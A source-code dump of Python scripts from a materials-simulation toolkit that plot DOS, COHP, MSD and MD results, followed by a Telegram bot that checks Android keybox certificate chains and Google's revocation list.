data = np.loadtxt(f"{config['name']}_{data_type}.out")
min_value = np.min(data)
max_value = np.max(data)
index = data.shape[1] // 2
axes.plot(data[:, index:], data[:, :index], '.', color=color, label=data_type)
axes.plot(np.linspace(min_value, max_value, num=10), np.linspace(min_value, max_value, num=10), '-', color="k")
rmse = np.sqrt(mean_squared_error(data[:, :index], data[:, index:]))
r2 = r2_score(data[:, :index], data[:, index:])
axes.text(xy[0], xy[1],
f'{data_type} RMSE={1000 * rmse:.3f}({"m" + config["unit"] if config["name"] != "stress" else "MPa"} )\n{data_type} $R^2$={r2:.3f}',
transform=axes.transAxes, fontsize=13)
handles, labels = axes.get_legend_handles_labels()
label_dict = dict(zip(labels, handles))
axes.legend(label_dict.values(), label_dict, frameon=False, ncol=2, columnspacing=1)
axes.set_xlabel(f'DFT {config["name"]} ({config["unit"]})')
axes.set_ylabel(f'NEP {config["name"]} ({config["unit"]})')
if __name__ == '__main__':
out_num = len(glob.glob("*.out"))
test_out_num = len(glob.glob("*test.out"))
rows = 2 if out_num >= 4 else 1
cols = (out_num - test_out_num) // rows + (out_num - test_out_num) % rows
fig = plt.figure(figsize=(6 * cols, 5 * rows))
grids = fig.add_gridspec(rows, cols)
if os.path.exists("loss.out"):
axes_index = 0
axes = fig.add_subplot(grids[axes_index])
axes_index += 1
plot_loss_result(axes)
else:
axes_index = 0
for config in Config:
if not os.path.exists(f"{config['name']}_train.out"):
continue
axes = fig.add_subplot(grids[axes_index])
plot_train_result(axes, config)
axes_index += 1
plt.subplots_adjust(left=0.1, right=0.95, bottom=0.1, top=0.95)
plt.savefig("nep_result.png", dpi=150)
| 3,234 | Python | .py | 77 | 35.246753 | 150 | 0.581662 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,174 | plot_bond.py | aboys-cb_VaspTool/script/plot/plot_bond.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/8/10 22:51
# @Author : 兵
# @email : [email protected]
"""
画原子键长变化的 临时写的
"""
# path=sys.argv[1]
import matplotlib.pyplot as plt
from ase.io import read as ase_read
path = "dump.xyz"
frames = ase_read(path, ":", format="extxyz")
bonds = []
for atoms in frames:
# print(atoms[16])
dis = atoms.get_distance(27, 55)
bonds.append(dis)
plt.plot(list(range(len(bonds))), bonds)
plt.show()
| 491 | Python | .py | 20 | 21.45 | 45 | 0.660633 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,175 | plot_dos.py | aboys-cb_VaspTool/script/plot/plot_dos.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/5/9 22:40
# @Author : å…µ
# @email : [email protected]
import matplotlib
import numpy as np
matplotlib.use("Agg")
import palettable
from matplotlib import pyplot as plt
from pymatgen.electronic_structure.core import OrbitalType, Spin
from pymatgen.electronic_structure.plotter import DosPlotter
from pymatgen.io.vasp import Vasprun
plt.style.use("./science.mplstyle")
class MyDosPlotter(DosPlotter):
def get_plot(
self,
xlim=None,
ylim=None,
ax=None,
invert_axes=False,
beta_dashed=False,
):
n_colors = min(9, max(3, len(self._doses)))
colors = palettable.colorbrewer.qualitative.Set1_9.mpl_colors
ys = None
all_densities = []
all_energies = []
for dos in self._doses.values():
energies = dos["energies"]
densities = dos["densities"]
if not ys:
ys = {
Spin.up: np.zeros(energies.shape),
Spin.down: np.zeros(energies.shape),
}
new_dens = {}
for spin in [Spin.up, Spin.down]:
if spin in densities:
if self.stack:
ys[spin] += densities[spin]
new_dens[spin] = ys[spin].copy()
else:
new_dens[spin] = densities[spin]
all_energies.append(energies)
all_densities.append(new_dens)
keys = list((self._doses))
# all_densities.reverse()
# all_energies.reverse()
all_pts = []
for idx, key in enumerate(keys):
for spin in [Spin.up, Spin.down]:
if spin in all_densities[idx]:
energy = all_energies[idx]
densities = list(int(spin) * all_densities[idx][spin])
if invert_axes:
x = densities
y = energy
else:
x = energy
y = densities
all_pts.extend(list(zip(x, y)))
if self.stack:
ax.fill(x, y, color=colors[idx % n_colors], label=str(key))
elif spin == Spin.down and beta_dashed:
ax.plot(x, y, color=colors[idx % n_colors], label=str(key), linestyle="--" )
else:
ax.plot(x, y, color=colors[idx % n_colors], label=str(key) )
if xlim:
ax.set_xlim(xlim)
if ylim:
ax.set_ylim(ylim)
elif not invert_axes:
xlim = ax.get_xlim()
relevant_y = [p[1] for p in all_pts if xlim[0] < p[0] < xlim[1]]
ax.set_ylim((min(relevant_y), max(relevant_y)))
if not xlim and invert_axes:
ylim = ax.get_ylim()
relevant_y = [p[0] for p in all_pts if ylim[0] < p[1] < ylim[1]]
ax.set_xlim((min(relevant_y), max(relevant_y)))
if self.zero_at_efermi:
xlim = ax.get_xlim()
ylim = ax.get_ylim()
ax.plot(xlim, [0, 0], "k--" ) if invert_axes else ax.plot([0, 0], ylim, "k--" )
if invert_axes:
ax.axvline(x=0, color="k", linestyle="-" )
# ax.xaxis.set_major_locator(ticker.MaxNLocator(nbins=2, integer=True))
# ax.yaxis.set_major_locator(ticker.MaxNLocator( integer=True))
# ax.xaxis.set_minor_locator(ticker.AutoMinorLocator())
# ax.yaxis.set_minor_locator(ticker.AutoMinorLocator())
else:
# ax.xaxis.set_major_locator(ticker.MaxNLocator( integer=True))
# ax.yaxis.set_major_locator(ticker.MaxNLocator(nbins=2, integer=True))
# ax.xaxis.set_minor_locator(ticker.AutoMinorLocator())
# ax.yaxis.set_minor_locator(ticker.AutoMinorLocator())
ax.axhline(y=0, color="k", linestyle="-" )
# ax.tick_params(axis='both', which='both', direction='in')
# ax.tick_params(axis='both', which='both', direction='in')
# plt.xticks(fontsize=16)
# plt.yticks(fontsize=16)
# plt.tick_params(labelsize=16)
# Remove duplicate labels with a dictionary
handles, labels = ax.get_legend_handles_labels()
label_dict = dict(zip(labels, handles))
ax.legend(label_dict.values(), label_dict, frameon=False, ncol=2, columnspacing=1 )
def plot_all(self, dos_conf, invert_axes=True, energy_lim=None, density_lim=None):
orb_map = ["s", "p", "d", "f"]
if invert_axes:
xlim, ylim = density_lim, energy_lim
fig, axes = plt.subplots(1, len(dos_conf), sharex=True, sharey=True)
else:
xlim, ylim = energy_lim, density_lim
fig, axes = plt.subplots(len(dos_conf), 1, sharex=True, sharey=True)
if len(dos_conf)==1:
axes=[axes]
axes:list[plt.Axes]
for col, conf in enumerate(dos_conf):
vasprun = Vasprun(conf["path"], parse_potcar_file=False)
# self.add_dos("total", vasprun.tdos)
for elem, orbits in conf["projected"].items():
if isinstance(elem,int):
site=vasprun.final_structure[elem-1]
elem=site.label
elem_dos = vasprun.complete_dos.get_site_spd_dos(site)
else:
elem_dos = vasprun.complete_dos.get_element_spd_dos(elem)
for orb in orbits:
orb_type = OrbitalType(orb_map.index(orb))
self.add_dos(f"{elem}-{orb}", elem_dos[orb_type])
self.get_plot(xlim, ylim, ax=axes[col], invert_axes=invert_axes)
if invert_axes:
if col == 0:
axes[0].set_ylabel("Energy (eV)")
axes[col].set_xlabel("DOS (states/eV)" )
else:
if col == len(dos_conf) - 1:
axes[col].set_xlabel("Energy (eV)")
axes[col].set_ylabel("DOS (states/eV)" )
self._doses.clear()
plt.tight_layout(h_pad=0)
if __name__ == '__main__':
plotter = MyDosPlotter()
dos_conf = [
{"path": "./vasprun.xml",
"projected": {"I": ["p"], "Ag": ["d"], "Bi": ["p"]},
},
]
plotter.plot_all(dos_conf, energy_lim=(-2, 2), density_lim=(-10, 10), invert_axes=False)
plt.savefig("./dos.png", dpi=300)
| 6,571 | Python | .py | 149 | 31.302013 | 100 | 0.527298 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,176 | msd.py | aboys-cb_VaspTool/script/plot/msd.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/18 19:18
# @Author : 兵
# @email : [email protected]
from pymatgen.analysis.diffusion.analyzer import DiffusionAnalyzer
from pymatgen.core.trajectory import Trajectory
from pymatgen.io.vasp.outputs import Vasprun
# 这一步是读取 XDATCAR,得到一系列结构信息
traj = Vasprun("./vasprun.xml").get_trajectory()
traj: Trajectory
# 这一步是实例化 DiffusionAnalyzer 的类
# 并用 from_structures 方法初始化这个类; 900 是温度,2 是POTIM 的值,1是间隔步数
# 间隔步数(step_skip)不太容易理解,但是根据官方教程:
# dt = timesteps * self.time_step * self.step_skip
diff = DiffusionAnalyzer.from_structures(traj, 'Ag', 300, 1, 10)
# 可以用内置的 plot_msd 方法画出 MSD 图像
# 有些终端不能显示图像,这时候可以调用 export_msdt() 方法,得到数据后再自己作图
# diff.plot_msd()
# plt.show()
| 957 | Python | .py | 20 | 35.2 | 66 | 0.758865 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,177 | plt.py | aboys-cb_VaspTool/script/plot/plt.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/13 22:37
# @Author : å…µ
# @email : [email protected]
from gpyumd.load import load_thermo
from pylab import *
matplotlib.use('Agg')
data = load_thermo()
plot(list(range(data["U"].shape[0])), data["U"])
savefig("./en.png", dpi=150)
| 304 | Python | .py | 11 | 26.363636 | 48 | 0.652921 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,178 | plot_aimd.py | aboys-cb_VaspTool/script/plot/plot_aimd.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/13 12:09
# @Author : 兵
# @email : [email protected]
"""
绘制分子动力学的
"""
import sys
import matplotlib.pyplot as plt
from pymatgen.io.vasp.outputs import Vasprun
plt.style.use("./science.mplstyle")
# vasp_path=sys.argv[1]
plt.figure(figsize=(3.5, 2.625))
# vasp_path = "./vasprun.xml"
vasp_path = sys.argv[1]
vasprun = Vasprun(vasp_path, parse_potcar_file=False)
name = vasprun.final_structure.composition.to_pretty_string()
energies = [step["e_0_energy"] for step in vasprun.ionic_steps]
steps = list(range(1, len(energies) + 1))
plt.plot(steps, energies, label=name)
plt.ylabel("E0 Energy(eV)")
plt.xlabel("time(fs)")
plt.legend()
plt.tight_layout()
plt.savefig(f"./aimd-{name}.png", dpi=300)
| 784 | Python | .py | 26 | 28.230769 | 63 | 0.715646 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,179 | plot_dos_cohp.py | aboys-cb_VaspTool/script/plot/plot_dos_cohp.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/5/18 19:19
# @Author : 兵
# @email : [email protected]
from itertools import product
from typing import Literal
import matplotlib.pyplot as plt
import numpy as np
import palettable
from matplotlib.patches import ConnectionPatch
from numpy._typing import ArrayLike
from pymatgen.electronic_structure.cohp import Cohp, CompleteCohp
from pymatgen.electronic_structure.core import Spin, Orbital, OrbitalType
from pymatgen.electronic_structure.dos import Dos
from pymatgen.io.vasp import Vasprun
plt.style.use("./science.mplstyle")
class DosCohpPlotter:
def __init__(self, zero_at_efermi=True):
self.figure = plt.figure( )
self.stack=False
self.zero_at_efermi = zero_at_efermi
self._doses: dict[
str, dict[Literal["energies", "densities", "efermi"], float | ArrayLike | dict[Spin, ArrayLike]]
] = {}
self._cohps: dict[str, dict[str, np.ndarray | dict[Spin, np.ndarray] | float]] = {}
def add_dos(self, label, dos:Dos):
"""Add a dos for plotting.
从其他地方粘贴的
Args:
label: label for the DOS. Must be unique.
dos: Dos object
"""
if dos.norm_vol is None:
self._norm_val = False
energies = dos.energies - dos.efermi if self.zero_at_efermi else dos.energies
densities = dos.densities
efermi = dos.efermi
self._doses[label] = {
"energies": energies,
"densities": densities,
"efermi": efermi,
}
def add_cohp(self, label, cohp:Cohp):
"""Add a COHP for plotting.
从其他地方粘贴的
Args:
label: Label for the COHP. Must be unique.
cohp: COHP object.
"""
energies = cohp.energies - cohp.efermi if self.zero_at_efermi else cohp.energies
populations = cohp.get_cohp()
int_populations = cohp.get_icohp()
self._cohps[label] = {
"energies": energies,
"COHP": populations,
"ICOHP": int_populations,
"efermi": cohp.efermi,
}
@staticmethod
def get_orb_list(orb: str):
"""
:param orb: str 4d or 5p
:return:
"""
result = []
for i in Orbital:
if str(i.orbital_type) == orb[1:]:
result.append(orb[:1] + i.name)
return result
def compose_orbit(self,orb):
"""
对传入的轨道进行拆分组合
:param orb: 4d-5p or 4d-5px or 4dx2-5p
:return:
"""
a, b = orb.split("-")
a_orb = [a] if a[-1] not in ["s", "p", "d", "f"] else self.get_orb_list(a)
b_orb = [b] if b[-1] not in ["s", "p", "d", "f"] else self.get_orb_list(b)
result = []
for a, b in product(a_orb, b_orb):
result.append(f"{a}-{b}")
return result
def parse_config(self,dos_config:dict, cohp_config:dict):
"""
解析下投影配置文件 将需要画图的放在字典里
:param dos_config: dict
:param cohp_config: dict
:return:
Examples
-----
dos_conf = {"vasprun_path": "../cache/Cs1Ag0.5Bi0.5I3/vasprun.xml",
"projected": {"I": ["p"],"Ag": [ "d"],"Bi": ["p" ] },
}
cohp_conf={
"cohpcar_path":"../cache/Cs1Ag0.5Bi0.5I3/COHPCAR.lobster",
"poscar_path":"../cache/Cs1Ag0.5Bi0.5I3/POSCAR",
"projected": {"I": ["p"], "Ag": ["d"], "Bi": ["p"]}
}
plotter=DosCohpPlotter()
plotter.parse_config(dos_conf,cohp_conf)
"""
#解析dos的
orb_map = ["s", "p", "d", "f"]
vasprun = Vasprun(dos_config["vasprun_path"], parse_potcar_file=False)
#加入总的dos 先不加入 主要看投影
# self.add_dos("total", vasprun.tdos)
for elem, orbits in dos_config["projected"].items():
if isinstance(elem, int):
site = vasprun.final_structure[elem - 1]
elem = site.label
elem_dos = vasprun.complete_dos.get_site_spd_dos(site)
else:
elem_dos = vasprun.complete_dos.get_element_spd_dos(elem)
for orb in orbits:
orb_type = OrbitalType(orb_map.index(orb))
self.add_dos(f"{elem}-{orb}", elem_dos[orb_type])
#解析cohp
complete_cohp = CompleteCohp.from_file(filename=cohp_config["cohpcar_path"], fmt='LOBSTER',
structure_file=cohp_config["poscar_path"])
for elem_label, config in cohp_config["projected"].items():
if isinstance(config["label"], tuple):
label = [str(i) for i in range(config["label"][0], config["label"][1] + 1)]
else:
label = config["label"]
cohp=None
for orb in config["orb"]:
for _orb in self.compose_orbit(orb):
# complete_cohp.get_summed_cohp_by_label_list()
_cohp = complete_cohp.get_summed_cohp_by_label_and_orbital_list(label,[_orb] * len(label))
if cohp is None:
cohp=_cohp
else:
#对轨道进行加和
if Spin.up in cohp.cohp.keys():
cohp.cohp[Spin.up]+=_cohp.cohp[Spin.up]
if Spin.down in cohp.cohp.keys():
cohp.cohp[Spin.down] += _cohp.cohp[Spin.down]
if cohp:
self.add_cohp(elem_label, cohp)
def get_plot(self, energy_lim=(-2, 2), density_lim=(-10, 10), cohp_lim=(-5,5), invert_axes=False):
if invert_axes:
#反转 竖排模式 左边为Dos 右边为Cohp
pass
gridspec = self.figure.add_gridspec(1, 2,
wspace=0.1 ,
width_ratios=[1,1],
)
else:
#上下堆叠 上面为Dos 下面为Cohp
gridspec = self.figure.add_gridspec(2, 1,
hspace=0.1 ,
height_ratios=[1,1],
)
#先画Dos
dos_axes=self.figure.add_subplot(gridspec[0])
n_colors = min(9, max(3, len(self._doses)))
colors = palettable.colorbrewer.qualitative.Set1_9.mpl_colors
all_pts = []
idx=0
for idx, key in enumerate(self._doses.keys()):
for spin in [Spin.up, Spin.down]:
if spin in self._doses[key]["densities"]:
energy = self._doses[key]["energies"]
densities = list(int(spin) * self._doses[key]["densities"][spin])
if invert_axes:
x = densities
y = energy
else:
x = energy
y = densities
all_pts.extend(list(zip(x, y)))
if self.stack:
dos_axes.fill(x, y, color=colors[idx % n_colors], label=str(key))
else:
dos_axes.plot(x, y, color=colors[idx % n_colors], label=str(key) )
# 画cohp
cohp_axes = self.figure.add_subplot(gridspec[1])
n_colors = min(9, max(3, len(self._cohps)))
for idx, key in enumerate(self._cohps.keys()):
energies = self._cohps[key]["energies"]
populations = self._cohps[key]["COHP"]
for spin in [Spin.up, Spin.down]:
if spin in populations:
if invert_axes:
x = -populations[spin]
y = energies
else:
x = energies
y = -populations[spin]
if spin == Spin.up:
cohp_axes.plot(
x,
y,
color=colors[idx % n_colors],
linestyle="-",
label=str(key),
)
else:
cohp_axes.plot(x, y, color=colors[idx % n_colors], linestyle="--", linewidth=3)
cohp_axes.tick_params(axis='both', which='both', direction='in')
dos_axes.tick_params(axis='both', which='both', direction='in')
energy_label = "$E - E_f$ (eV)" if self.zero_at_efermi else "Energy (eV)"
energy_label="Energy (eV)"
if invert_axes:
#画一个水平线
con = ConnectionPatch(xyA=(density_lim[0],0), xyB=(cohp_lim[1],0), coordsA="data", coordsB="data",
axesA=dos_axes, axesB=cohp_axes, color="k",linestyle="--", linewidth=0.5)
cohp_axes.add_artist(con)
cohp_axes.text(0.1 , 0.1, 'Antibonding', transform=cohp_axes.transAxes,rotation="vertical" , color='k')
cohp_axes.text(0.8, 0.16, 'Bonding', transform=cohp_axes.transAxes,rotation="vertical" , color='k')
# cohp_axes.set_xticklabels([])
cohp_axes.set_yticklabels([])
cohp_axes.set_xlim(cohp_lim)
cohp_axes.set_ylim(energy_lim)
cohp_axes.axvline(x=0, color="k", linestyle="-", linewidth=0.5)
handles, labels = cohp_axes.get_legend_handles_labels()
label_dict = dict(zip(labels, handles))
cohp_axes.legend(label_dict.values(), label_dict, loc="upper right" )
cohp_axes.set_xlabel("-COHP")
# dos_axes.set_xticklabels([])
dos_axes.axvline(x=0, color="k", linestyle="-", linewidth=0.5 )
dos_axes.set_xlim(density_lim)
dos_axes.set_ylim(energy_lim)
dos_axes.set_ylabel(energy_label)
dos_axes.set_xlabel("DOS (states/eV)")
handles, labels = dos_axes.get_legend_handles_labels()
label_dict = dict(zip(labels, handles))
dos_axes.legend(label_dict.values(), label_dict, loc="upper right" )
else:
con = ConnectionPatch(xyA=( 0,density_lim[1]), xyB=(0,cohp_lim[0]), coordsA="data", coordsB="data",
axesA=dos_axes, axesB=cohp_axes, color="k",linestyle="--")
cohp_axes.add_artist(con)
cohp_axes.text(0.2 , 0.1, 'Antibonding', transform=cohp_axes.transAxes, color='k')
cohp_axes.text(0.2 , 0.7, 'Bonding', transform=cohp_axes.transAxes, color='k')
# cohp_axes.set_yticklabels([])
cohp_axes.axhline(y=0, color="k", linestyle="-" )
cohp_axes.set_ylim(cohp_lim)
cohp_axes.set_xlim(energy_lim)
cohp_axes.set_ylabel("-COHP")
cohp_axes.set_xlabel(energy_label)
dos_axes.set_xticklabels([])
# dos_axes.set_yticklabels([])
dos_axes.set_xlim(energy_lim)
dos_axes.set_ylim(density_lim)
dos_axes.axhline(y=0, color="k", linestyle="-" )
dos_axes.set_ylabel("DOS (states/eV)")
handles, labels = dos_axes.get_legend_handles_labels()
label_dict = dict(zip(labels, handles))
dos_axes.legend(label_dict.values(), label_dict,ncols=2, loc="upper right" )
handles, labels = cohp_axes.get_legend_handles_labels()
label_dict = dict(zip(labels, handles))
cohp_axes.legend(label_dict.values(), label_dict,ncols=2, loc="upper right" )
#如果边框太多空白 调整这里
plt.subplots_adjust(left=0.1, right=0.9 ,bottom=0.1, top=0.9 )
if __name__ == '__main__':
# dos_conf = {"vasprun_path": "../cache/Cs1Ag0.5Bi0.5I3/vasprun.xml",
# "projected": {"I": ["p"],"Ag": [ "d"],"Bi": ["s","p" ] },
# }
#
# cohp_conf={
# "cohpcar_path":"../cache/Cs1Ag0.5Bi0.5I3/COHPCAR.lobster",
# "poscar_path":"../cache/Cs1Ag0.5Bi0.5I3/POSCAR",
# "projected": {"Bi(6s)-I(5p)":{
# "label":(185,190),
# "orb":["6s-5p"]
# },
# "Bi(6p)-I(5p)": {
# "label": (185, 190),
# "orb": ["6p-5p"]
# },
# "Ag(4d)-I(5p)": {
# "label": (161, 166),
# "orb": ["4d-5p"]
# }
# }
#
# }
sb_dos_conf = {"vasprun_path": "../cache/Cs8Ag4Bi3Sb1I24/vasprun.xml",
"projected": {"I": ["p"],"Ag": [ "d"],"Bi": ["s","p" ] , "Sb": ["s","p" ] },
}
sb_cohp_conf={
"cohpcar_path":"../cache/Cs8Ag4Bi3Sb1I24/COHPCAR.lobster",
"poscar_path":"../cache/Cs8Ag4Bi3Sb1I24/POSCAR",
"projected": {"Bi(6s)-I(5p)":{
"label":(185,190),
"orb":["6s-5p"]
},
"Bi(6p)-I(5p)": {
"label": (185, 190),
"orb": ["6p-5p"]
},
"Sb(5s)-I(5p)": {
"label": (203, 208),
"orb": ["5s-5p"]
},
"Sb(5p)-I(5p)": {
"label": (203, 208),
"orb": ["5p-5p"]
},
"Ag(4d)-I(5p)": {
"label": (161, 166),
"orb": ["4d-5p"]
}
}
}
# cu_dos_conf = {"vasprun_path": "../cache/Cu/vasprun.xml",
# "projected": {"I": ["p"], "Ag": ["d"], "Bi": ["s", "p"], "Cu": ["d"]},
# }
#
# cu_cohp_conf = {
# "cohpcar_path": "../cache/Cu/COHPCAR.lobster",
# "poscar_path": "../cache/Cu/POSCAR",
# "projected": {"Bi(6s)-I(5p)": {
# "label": (185, 190),
# "orb": ["6s-5p"]
# },
# "Bi(6p)-I(5p)": {
# "label": (185, 190),
# "orb": ["6p-5p"]
# },
#
# "Cu(4d)-I(5p)": {
# "label": (161, 166),
# "orb": ["3d-5p"]
# },
# "Ag(4d)-I(5p)": {
# "label": (167, 172),
# "orb": ["4d-5p"]
# }
# }
#
# }
# 这里可以是分轨道 比如"6px-5px" 如果不是分轨道 会把所有的加和
plotter=DosCohpPlotter()
plotter.parse_config(sb_dos_conf,sb_cohp_conf)
plotter.get_plot(invert_axes=True,cohp_lim=(-10,20),energy_lim=(-2,2),density_lim=(0,10))
plt.savefig("dos_and_cohp_sb.png") | 14,961 | Python | .py | 338 | 30.653846 | 117 | 0.477212 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,180 | plot_gpumd_result.py | aboys-cb_VaspTool/script/plot/plot_gpumd_result.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/13 22:23
# @Author : 兵
# @email : [email protected]
import os.path
import matplotlib
matplotlib.use('Agg')
from gpyumd.load import load_thermo
import matplotlib.pyplot as plt
if os.path.exists("thermo.out"):
data = load_thermo()
plt.plot(list(range(data["U"].shape[0])), data["U"])
plt.savefig("./energy.png", dpi=150)
else:
print("没有找到画图文件,请完善逻辑!")
| 473 | Python | .py | 16 | 25.25 | 56 | 0.674584 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,181 | main.py | chitang233_KeyboxChecker/main.py | import subprocess
import tempfile
import re
import requests
import telebot
from os import getenv
def verify_certificate_chain(keybox):
keybox = keybox.replace("\r\n", "\n")
keybox = keybox.split("</CertificateChain>")[0]
pattern = r"-----BEGIN CERTIFICATE-----\n.*?\n-----END CERTIFICATE-----"
certificates = re.findall(pattern, keybox, re.DOTALL)
if len(certificates) < 2:
return "❓ Invalid certificate chain"
elif len(certificates) == 2:
certificates = {"end_entity": certificates[0], "root": certificates[1]}
elif len(certificates) == 3:
certificates = {"end_entity": certificates[0], "intermediate": certificates[1], "root": certificates[2]}
else:
return "❓ Invalid certificate chain"
with tempfile.NamedTemporaryFile(delete=True) as root_cert_file:
root_cert_file.write(certificates['root'].encode())
root_cert_file.flush()
root_pubkey = subprocess.run(
['openssl', 'x509', '-in', root_cert_file.name, '-pubkey', '-noout'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True
)
if root_pubkey.returncode != 0:
return f"OpenSSL error: {root_pubkey.stderr}"
if root_pubkey.returncode == 0:
with open("google_ca_pubkey.key", "r") as google_pubkey_file:
google_pubkey = google_pubkey_file.read()
if root_pubkey.stdout.encode() != google_pubkey.encode():
message = "❌ Root certificate is not signed by Google"
else:
message = "✅ Root certificate is signed by Google"
with tempfile.NamedTemporaryFile(delete=True) as end_entity_cert_file:
end_entity_cert_file.write(certificates['end_entity'].encode())
end_entity_cert_file.flush()
if "intermediate" in certificates:
with tempfile.NamedTemporaryFile(delete=True) as intermediate_cert_file:
intermediate_cert_file.write(certificates['intermediate'].encode())
intermediate_cert_file.flush()
result = subprocess.run(
['openssl', 'verify', '-CAfile', root_cert_file.name, '-untrusted', intermediate_cert_file.name, end_entity_cert_file.name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True
)
else:
result = subprocess.run(
['openssl', 'verify', '-CAfile', root_cert_file.name, end_entity_cert_file.name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True
)
if result.returncode != 0:
message += f"\n❌ Invalid certificate chain: {result.stderr}"
else:
message += "\n✅ Certificate chain is valid"
return message
def extract_certificate_information(cert_pem):
with tempfile.NamedTemporaryFile(delete=True) as temp_cert_file:
temp_cert_file.write(cert_pem.encode())
temp_cert_file.flush()
result = subprocess.run(
['openssl', 'x509', '-text', '-noout', '-in', temp_cert_file.name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True
)
if result.returncode != 0:
raise RuntimeError(f"OpenSSL error: {result.stderr}")
cert_text = result.stdout
pattern = r"Serial Number:\s*([\da-f:]+)"
match = re.search(pattern, cert_text, re.IGNORECASE)
if match:
serial_number = hex(int(match.group(1).replace(":", ""), 16)).split("0x")[1]
else:
return "❌ Cannot find serial number"
pattern = r"Subject: "
match = re.search(pattern, cert_text, re.IGNORECASE)
if match:
subject = cert_text[match.end():].split("\n")[0]
else:
return "❌ Cannot find subject"
return [serial_number, subject]
def common_handler(message):
if message.reply_to_message and message.reply_to_message.document:
document = message.reply_to_message.document
elif message.document:
document = message.document
else:
bot.reply_to(message, "Please reply to a message with a keybox file or send a keybox file")
return None
file_info = bot.get_file(document.file_id)
file = requests.get('https://api.telegram.org/file/bot{0}/{1}'.format(API_TOKEN, file_info.file_path))
certificate = extract_certificate_information(file.text.split("<Certificate format=\"pem\">")[1].split("</Certificate>")[0])
reply = f"ℹ️ Serial Number: `{certificate[0]}`\nℹ️ Subject: `{certificate[1]}`"
reply += f"\n{verify_certificate_chain(file.text)}"
try:
status = get_google_sn_list()['entries'][certificate[0]]
reply += f"\n❌ Serial number found in Google's revoked keybox list\nReason: `{status['reason']}`"
except KeyError:
if certificate[0] == "4097":
reply += "\n❌ AOSP keybox found, this keybox is untrusted"
else:
reply += "\n✅ Serial number not found in Google's revoked keybox list"
bot.reply_to(message, reply, parse_mode='Markdown')
def get_google_sn_list():
url = "https://android.googleapis.com/attestation/status"
response = requests.get(
url,
headers={
"Cache-Control": "max-age=0, no-cache, no-store, must-revalidate",
"Pragma": "no-cache",
"Expires": "0",
}
).json()
return response
API_TOKEN = getenv('API_TOKEN')
bot = telebot.TeleBot(API_TOKEN)
@bot.message_handler(commands=['start', 'help'])
def send_welcome(message):
bot.reply_to(message, "Send me keybox file and I will check if it's revoked")
@bot.message_handler(content_types=['document'])
def handle_document(message):
common_handler(message)
@bot.message_handler(commands=['keybox'])
def handle_keybox(message):
common_handler(message)
bot.infinity_polling()
| 5,253 | Python | .py | 133 | 36.12782 | 130 | 0.716088 | chitang233/KeyboxChecker | 8 | 0 | 0 | AGPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |